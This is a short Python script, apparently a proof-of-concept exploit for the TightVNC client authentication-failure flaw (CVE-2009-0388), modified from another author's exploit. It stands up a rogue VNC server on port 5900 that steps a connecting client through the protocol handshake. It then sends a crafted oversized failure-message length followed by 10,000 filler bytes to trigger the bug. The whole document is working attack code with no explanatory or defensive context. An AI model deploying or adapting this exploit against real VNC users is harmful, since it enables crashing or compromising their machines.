#!/usr/bin/env python #digital.desi@in.com # Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388 import socket serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) serversocket.bind(('', 5900)) serversocket.listen(1) while True: clientsocket, clientaddres = serversocket.accept() data = 'RFB 003.008\n' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) print data_cli data = '\x02\x02\x10' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) data = '\x00'*4 clientsocket.sendall(data) data = ('\x00'*3)+'\x01' clientsocket.sendall(data) data = ('\x00'*3)+'\x02STDVVNCAUTH_' clientsocket.sendall(data) data_cli = clientsocket.recv(1024) data = ('\x01'*16) clientsocket.sendall(data) data_cli = clientsocket.recv(1024) data = '\x00\x00\x00\x01' clientsocket.sendall(data) data = '\xf0\xff\xff\xff' clientsocket.sendall(data) data = 'A'*10000 clientsocket.sendall(data) clientsocket.close() serversocket.close()